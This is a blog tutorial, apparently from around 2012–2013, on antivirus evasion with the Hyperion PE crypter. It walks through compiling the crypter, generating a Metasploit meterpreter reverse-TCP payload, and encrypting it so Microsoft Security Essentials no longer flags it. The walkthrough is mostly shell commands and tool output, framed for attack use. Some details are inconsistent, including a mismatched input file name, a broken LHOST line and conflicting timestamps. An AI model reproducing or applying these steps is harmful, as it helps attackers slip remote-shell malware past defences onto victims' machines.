Hyperion : PE Crypters Exploit

PE Crypters (Hyperion)

I recently watched a presentation that rel1k gave at bSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated Binary Droppers, Shellcodeexec, Powershell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE Packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted and encapsulated with a weak 128-bit AES key, which is simply brute forced at the time of execution. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools need to cross-compile executables.
1. root@bt:/opt# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
2. root@bt:/opt# unzip Hyperion-1.0.zip 
3. root@bt:/opt# cd Hyperion-1.0
4. root@bt:/opt/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe 
./Src/Crypter/*.cpp -o crypter.exe
5. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2013-07-18 17:52 crypter.exe

Now that we have our Hyperion crypter executable. Let’s create a Metasploit payload.
6. root@bt:/opt/Hyperion-1.0# msfpayload windows/meterpreter/reverse_tcp 
LHOST=(your ip e.g.: LPORT=4444 x > Test.exe
7. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2013-07-18 17:53 crypter.exe
-rw-r--r-- 1 root root  73802 2013-07-18 16:53 Test.exe

Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.

As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.
8. root@bt:/opt/Hyperion-1.0# wine crypter.exe payload.exe encrypted_Test.exe

Opening Test.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_Test.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

9. root@bt:/opt/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

10. root@bt:/opt/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_Test.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 Test.exe
And if we copy our encrypted payload to our Windows host…
Happy Crypting!

About Lasha Gogua

    Blogger Comment
    Facebook Comment


Post a Comment